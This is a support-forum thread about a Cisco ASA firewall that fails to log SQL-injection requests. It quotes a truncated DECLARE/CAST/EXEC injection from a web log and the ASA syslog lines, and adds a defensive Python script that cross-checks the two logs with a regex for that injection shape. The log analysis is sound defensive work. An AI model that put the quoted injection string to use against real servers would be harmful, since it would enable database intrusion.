ASA not logging certain requests?

w-schultz
Level 1

I have a bunch of attack requests not being logged by my asa-5550 version 7.2(4)

On my web-server I see an attack:

B.A.D.IP; HTTP/1.0 - [23/Jul/2008:11:37:30 -0700] GET /downloads/file/fid?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(...%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0 500 4635; null; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

The only thing I see in the ASA logs is:

Jul 23 11:37:29 192.168.22.254 %ASA-7-609001: Built local-host outside:B.A.D.IP

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718934 for outside:B.A.D.IP/2668 (B.A.D.IP/2668) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718936 for outside:B.A.D.IP/2669 (B.A.D.IP/2669) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718936 for outside:B.A.D.IP/2669 to inside:192.168.10.100/80 duration 0:00:01 bytes 4123 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718934 for outside:B.A.D.IP/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-7-609002: Teardown local-host outside:B.A.D.IP duration 0:00:01

Usually I'll get the ASA logs (%ASA-5-304001) that I can grep for and see all of the 'Accessed URL' lines. For some reason none of these attacks are being logged. I'm concerned that not only are they getting through, they are doing so silently.

2 Replies

Thank you for the response.

I am well aware of the logging types; the problem is that I'm not receiving the logging message 304001 for the given URI. I receive them for all other URIs, just not this specific attack.

My thought is that the ASA signature swallows it, does not send it to syslog, and then passes it on to the web server. I'm okay with it passing it along but it seems a little odd that it does not get logged.

I was getting many of these requests and see them on all of my web servers, but not one shows up in my syslog, while all the other 304001 messages do show up.
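
The check the poster is doing by hand in both posts above (grep the ASA syslog for %ASA-5-304001 and compare against the web-server access log) can be automated. The script below is an added example and not code from the thread or from Cisco: it parses both logs, pairs each web-server request with a 304001 "Accessed URL" message from the same source for the same path inside a small time window, and reports the requests that have no such message, flagging the ones whose query string has the DECLARE/CAST(0x...)/EXEC shape of the quoted attack. The sample log lines are constructed to match the formats quoted in the thread (203.0.113.7 stands in for B.A.D.IP, 198.51.100.10 for G.OO.D.IP); the 304001 layout `source Accessed URL dest:url`, the assumption that the ASA and the web server keep the same local time, and the 5-second window are all assumptions to adjust for a real deployment.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample lines in the two formats quoted in the thread; not real traffic.
# 203.0.113.7 stands in for B.A.D.IP and 198.51.100.10 for G.OO.D.IP (assumed values).
WEB_LOG = """\
203.0.113.7; HTTP/1.0 - [23/Jul/2008:11:37:30 -0700] GET /downloads/file/fid?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0 500 4635; null; Mozilla/4.0 (compatible; MSIE 6.0)
203.0.113.7; HTTP/1.0 - [23/Jul/2008:11:40:02 -0700] GET /index.html HTTP/1.0 200 1234; null; Mozilla/4.0 (compatible; MSIE 6.0)
"""
ASA_LOG = """\
Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718934 for outside:203.0.113.7/2668 (203.0.113.7/2668) to inside:192.168.10.100/80 (198.51.100.10/80)
Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718934 for outside:203.0.113.7/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs
Jul 23 11:40:02 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803719001 for outside:203.0.113.7/2701 (203.0.113.7/2701) to inside:192.168.10.100/80 (198.51.100.10/80)
Jul 23 11:40:02 192.168.22.254 %ASA-5-304001: 203.0.113.7 Accessed URL 192.168.10.100:/index.html
Jul 23 11:40:03 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803719001 for outside:203.0.113.7/2701 to inside:192.168.10.100/80 duration 0:00:01 bytes 1500 TCP FINs
"""

# Web-server line: "src; proto - [ts] METHOD url HTTP/x.y status bytes; referer; agent"
WEB_RE = re.compile(r'^(?P<src>\S+); \S+ - \[(?P<ts>[^\]]+)\] (?P<method>[A-Z]+) (?P<url>\S+) HTTP/\d\.\d (?P<status>\d{3})')
# Syslog line: "Mon DD HH:MM:SS host %ASA-sev-id: message"
ASA_RE = re.compile(r'^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ %ASA-\d-(?P<id>\d{6}): (?P<msg>.*)$')
BUILT_RE = re.compile(r'Built inbound TCP connection (?P<conn>\d+) for \S+:(?P<src>[\d.]+)/\d+ \(\S+\) to \S+:(?P<dst>[\d.]+)/(?P<dport>\d+)')
# Assumed 304001 layout: "[user] source Accessed URL dest:url"; search() tolerates an optional user field.
ACCESS_RE = re.compile(r'(?P<src>[\d.]+) Accessed URL (?P<dst>[\d.]+):(?P<url>\S+)')
# Shape of the payload quoted in the thread: DECLARE @S ... CAST(0x... AS CHAR) ... EXEC(@S).
SQLI_RE = re.compile(r'DECLARE\s*@\w+.*?EXEC\s*\(\s*@\w+\s*\)|CAST\s*\(\s*0x[0-9a-f]+\s+AS\s+N?(?:VAR)?CHAR', re.I | re.S)


def parse_web_log(text):
    """Return one dict per access-log request; the UTC offset is dropped (assumption: same local clock as the ASA)."""
    out = []
    for line in text.splitlines():
        m = WEB_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
            out.append({"ts": ts, "src": m["src"], "method": m["method"], "url": m["url"], "status": int(m["status"])})
    return out


def parse_asa_log(text, year):
    """Split ASA syslog into 302013 connection builds and 304001 URL accesses; syslog has no year, so supply it."""
    built, accessed = [], []
    for line in text.splitlines():
        m = ASA_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        if m["id"] == "302013" and (b := BUILT_RE.search(m["msg"])):
            built.append({"ts": ts, "src": b["src"], "dst": b["dst"], "dport": int(b["dport"]), "conn": int(b["conn"])})
        elif m["id"] == "304001" and (a := ACCESS_RE.search(m["msg"])):
            accessed.append({"ts": ts, "src": a["src"], "dst": a["dst"], "url": a["url"]})
    return built, accessed


def is_sql_injection(url):
    """True when the percent-decoded URL carries the DECLARE/CAST/EXEC injection shape."""
    return bool(SQLI_RE.search(unquote(url)))


def find_unlogged_requests(web, accessed, window_s=5):
    """Requests with no 304001 from the same source for the same path within window_s seconds."""
    window = timedelta(seconds=window_s)
    unlogged = []
    for req in web:
        path = req["url"].split("?", 1)[0]
        seen = any(a["src"] == req["src"] and a["url"].split("?", 1)[0] == path
                   and abs(a["ts"] - req["ts"]) <= window for a in accessed)
        if not seen:
            unlogged.append(req)
    return unlogged


def audit(web_text, asa_text, year):
    """Summarise the gap between what the web server served and what the ASA reported as Accessed URL."""
    web = parse_web_log(web_text)
    built, accessed = parse_asa_log(asa_text, year)
    missing = find_unlogged_requests(web, accessed)
    return {"requests": len(web), "built": len(built), "accessed": len(accessed),
            "unlogged": missing, "unlogged_injections": sum(is_sql_injection(r["url"]) for r in missing)}


if __name__ == "__main__":
    report = audit(WEB_LOG, ASA_LOG, 2008)
    print(f"{report['requests']} requests, {report['built']} connections built, {report['accessed']} Accessed URL messages")
    for r in report["unlogged"]:
        tag = "SQLi" if is_sql_injection(r["url"]) else "other"
        print(f"no 304001: {r['ts']} {r['src']} {r['method']} {r['url'][:60]} status={r['status']} [{tag}]")
```

Run it against real exports by replacing the two constants with file contents. A request in the "no 304001" list only means the firewall never emitted an Accessed URL message for it; the 302013/302014 pair in the thread shows the connection itself was still built and torn down normally, so the list is the set of requests to chase, not proof of what the ASA did with them.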
